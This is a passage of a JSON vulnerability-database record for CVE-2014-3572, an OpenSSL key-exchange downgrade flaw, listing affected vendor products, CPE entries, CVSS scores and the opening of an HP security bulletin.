{ "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pulse secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087180" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731-" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.5" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "systems insight manager sp6", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1.73" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.01" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73230" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363073770" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.10" }, { "model": "flex system interconnect fabric", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "cognos controller fp1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.4" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.179" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079140" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.20" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.01" }, { "model": "power systems 350.d0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087520" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.40" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "74.90" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.40" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "flex system p260 compute node /fc efd9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "app for vmware", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5950" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "junos os 12.3x48-d10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054540" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "004.000(1233)" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.10" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.7" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "ctpos 6.6r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cloud", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos os 13.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.103" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.01" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.52" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "550" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350078390" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504965" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.7" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87104.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.0.121" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "ios 15.5 s", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.7" }, { "model": "prime performance manager for sps ppm sp1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller for enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.0" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.70" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.6" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.31" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x44079170" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.1.2" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.8" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.5" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.8" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.00" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" } ], "sources": [ { "db": "BID", "id": "71942" }, { "db": "JVNDB", "id": "JVNDB-2014-007553" }, { "db": "NVD", "id": "CVE-2014-3572" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8zc", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3572" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130985" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "133325" } ], "trust": 0.5 }, "cve": "CVE-2014-3572", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-3572", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3572", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3572", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3572" }, { "db": "JVNDB", "id": "JVNDB-2014-007553" }, { "db": "NVD", "id": "CVE-2014-3572" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message. OpenSSL is prone to a security-bypass vulnerability. \nSuccessfully exploiting these issues may allow attackers to perform unauthorized actions. This may lead to other attacks. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04604357\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04604357\nVersion: 1\n\nHPSBGN03299 rev.1 - HP IceWall SSO Dfw, SSO Certd, MCRP, and Federation Agent\nrunning OpenSSL, Remote Disclosure of Information, Unauthorized Access\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-03-19\nLast Updated: 2015-03-19\n\nPotential Security Impact: Remote disclosure of information, unauthorized\naccess\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP IceWall SSO\nDfw, SSO Certd, MCRP, and Federation Agent running OpenSSL including:\n\nThe SSL vulnerability known as \"FREAK\", which could be exploited remotely to\nallow disclosure of information. \nOther vulnerabilities which could be exploited remotely resulting in\nunauthorized access. \n\nReferences:\n\nCVE-2014-3570\nCVE-2014-3572\nCVE-2014-8275\nCVE-2015-0204\nSSRT101987\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n CVE-2014-3572 and CVE-2015-0204\n\n HP IceWall MCRP Version 2.1 and 3.0\n HP IceWall SSO Dfw Version 8.0, 8.0 R1, 8.0 R2, 8.0 R3, and Version 10.0\n HP IceWall SSO Certd Version 8.0R3 with DB plugin patch 2 and Version\n10.0\n HP IceWall Federation Agent Version 3.0\n\n CVE-2014-3570 and CVE-2014-8275\n\n HP IceWall MCRP v2.1, v3.0\n HP IceWall SSO Dfw v8.0, v8.0 R1, v8.0 R2, v8.0 R3, and v10.0\n HP IceWall 